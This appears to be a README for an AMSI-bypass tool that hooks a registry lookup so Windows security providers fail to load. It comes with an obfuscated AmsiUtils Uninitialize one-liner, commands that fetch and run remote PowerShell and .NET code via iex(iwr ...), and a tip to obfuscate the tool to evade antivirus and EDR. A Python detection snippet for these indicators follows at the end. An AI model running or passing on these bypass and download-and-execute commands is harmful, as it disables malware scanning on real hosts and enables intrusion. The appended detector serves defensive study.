! UPDATE 06/07/2025
! Added win11 folder
! PS: This still works for many AV/EDR; the technique is not flagged, just the static compiled file. So just obfuscate it and it works lol!
! UPDATE 26/05/2025
! Added a counter for the .cs/.ps1 files so that after it has completed the redirection of "Software\Microsoft\AMSI\Providers", it will unhook RegOpenKeyExW
! This is to remove the overhead introduced by hooking every RegOpenKeyExW call, which was causing problems when RegOpenKeyExW is legitimately invoked
! For the PowerShell reflective loading and .ps1 script, MAKE SURE the process has fully loaded (you can run some arbitrary commands first)
! UPDATE 02/06/2025
! "Software\Microsoft\AMSI\Providers" is being detected, so the code for TrollDisappearKey.cs was altered to pass it in as an argument instead
bypass clr amsi
TrollDisappearKey.cs -> compile into a .exe that can load .exe assemblies without amsi scanning taking place during assembly.load()
bypass powershell amsi
TrollDisappearKeyPS.cs -> compile into a .dll to reflectively load
TrollDisappearKeyPS.ps1 -> copy paste into powershell (most likely to get flagged)
Upon Assembly.Load(), the internals of AMSI/CLR look up the registry key "Software\Microsoft\AMSI\Providers" to load the relevant provider DLLs (i.e. security vendor DLLs).
We hook the registry query function, and when AMSI/CLR tries to read "Software\Microsoft\AMSI\Providers" we overwrite its value to "Software\Microsoft\AMSI\Providers " (note the space after Providers).
This breaks the provider DLL loading process, and we are able to Assembly.Load() any .NET assembly we want.
For the PowerShell AMSI it's somewhat similar: we break the vendor DLL loading and call Uninitialize to trigger a reinitialize.
TrollDisappearKey.exe <URL TO .EXE ASSEMBLY> <ARGUMENT1,ARGUMENT2> <KEY>
TrollDisappearKey.exe "https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_x64/Seatbelt.exe" "AMSIProviders" "Software\Microsoft\AMSI\Providers"
##For PS Script
iex(iwr https://raw.githubusercontent.com/cybersectroll/TrollDisappearKey/refs/heads/main/TrollDisappearKeyPS.ps1 -UseBasicParsing).content
##For PS dll reflective after dl to disk
$code = (iwr https://raw.githubusercontent.com/cybersectroll/TrollDisappearKey/refs/heads/main/TrollDisappearKeyPS.cs -UseBasicParsing).content
Add-Type $code
[TrollDisappearKeyPS]::DisappearKey()
([Ref].Assembly.GetType([System.String]::Join("", "S", "y", "s", "t", "e", "m", ".", "M", "a", "n", "a", "g", "e", "m", "e", "n", "t", ".", "A", "u", "t", "o", "m", "a", "t", "i", "o", "n", ".", "A", "m", "s", "i", "U", "t", "i", "l", "s")).GetMethods('N'+'onPu'+'blic,st'+'at'+'ic') | Where-Object Name -eq Uninitialize).Invoke($object,$null)
Nothing actually, it's quite barebones with a short code profile so anyone can tweak it to their needs (e.g. tweak the code to load .dll assemblies instead of just .exe assemblies)
Should only be used for educational purposes!
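For defenders, the two artefacts this README names (the provider key string, and the split-up AmsiUtils / Uninitialize reflection call) can be matched in script-block or command-line telemetry once PowerShell string splitting is folded back together. The following is an added example, not part of this project's code; the indicator labels and the sample text are constructed for illustration.

```python
import re

# Indicators named in the README: the AMSI provider key the hook redirects and
# the AmsiUtils.Uninitialize call used to make PowerShell reinitialize AMSI.
PROVIDER_KEY = "software\\microsoft\\amsi\\providers"
TOKENS = ("amsiutils", PROVIDER_KEY)

JOIN_CALL = re.compile(r'::Join\(\s*(?:""|\'\')\s*,([^()]*)\)', re.I)
QUOTED = re.compile(r'"([^"]*)"|\'([^\']*)\'')
CONCAT = re.compile(r'(["\'])([^"\']*)\1\s*\+\s*(["\'])([^"\']*)\3')


def normalize(script):
    """Fold String.Join("", ...) and 'a'+'b' literals, then lowercase."""
    def fold_join(m):
        return '::Join("' + "".join(a + b for a, b in QUOTED.findall(m.group(1))) + '")'
    out = JOIN_CALL.sub(fold_join, script)
    while True:
        folded = CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", out)
        if folded == out:
            return out.lower()
        out = folded


def scan(script):
    """Return the indicator names (hypothetical labels) hit by one text blob."""
    raw, norm = script.lower(), normalize(script)
    hits = []
    if "amsiutils" in norm and "uninitialize" in norm:
        hits.append("amsiutils-uninitialize")
    if PROVIDER_KEY in norm:
        hits.append("amsi-provider-key")
    # A token visible only after folding was deliberately split in the source.
    if any(t in norm and t not in raw for t in TOKENS):
        hits.append("string-obfuscation")
    return hits


# Constructed samples: script-block text, a process command line, a benign query.
SAMPLES = [
    '[Ref].Assembly.GetType([System.String]::Join("", "System.Management.'
    'Automation.", "A", "m", "s", "i", "U", "tils")).GetMethods('
    "'N'+'onPu'+'blic,st'+'at'+'ic') | Where-Object Name -eq Uninitialize",
    'TrollDisappearKey.exe "<URL>" "<ARGS>" "Software\\Microsoft\\AMSI\\Providers"',
    'Get-ChildItem "HKLM:\\SOFTWARE\\Microsoft\\Windows" | Select-Object Name',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan(sample), "<-", sample[:48])
```

A provider-key match on its own also fires on legitimate administration of that key, so treat it as a lead to correlate with the other indicators.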

